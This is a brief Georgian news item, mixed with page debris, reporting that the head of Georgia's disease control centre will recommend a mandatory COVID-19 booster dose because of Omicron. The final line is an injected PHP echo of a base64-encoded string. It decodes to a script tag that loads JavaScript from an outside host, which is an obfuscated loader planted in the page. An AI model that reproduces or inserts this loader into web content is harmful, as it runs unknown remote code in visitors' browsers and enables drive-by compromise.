celsiusi
ავერსი შნაიდერი
დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელის, ამირან გამყრელიძის განცხადებით, საკოორდინაციო საბჭოს წარედგინება რეკომენდაცია, რომ ორჯერადად აცრილი მოქალაქეებისთვის მესამე, გამაძლიერებელი დოზა აუცილებელი გახდეს.
 
აღნიშნულის შესახებ დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელმა, ამირან გამყრელიძემ ონლაინ ბრიფინგზე განაცხადა.
 
„ომიკრონთან“ დაკავშირებით აუცილებელია აქტიური „ბიუსტერი“. აუცილებელი იქნება, რომ ყველა ადამიანმა, ვინც ორჯერ აიცრება, გაიკეთოს „ბუსტერი“. ჩვენ შევალთ რეკომენდაციით, რომ „ბუსტერი“ იყოს ყველასთვის აუცილებელი“,- აღნიშნავს გამყრელიძე.
 
ცნობისთვის, დღეს ამირან გამყრელიძემ განაცხადა, რომ საქართველოში კორონავირუსის ახალი შტამის, "ომიკრონის" შემთხვევები დადასტურდა.
1085
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");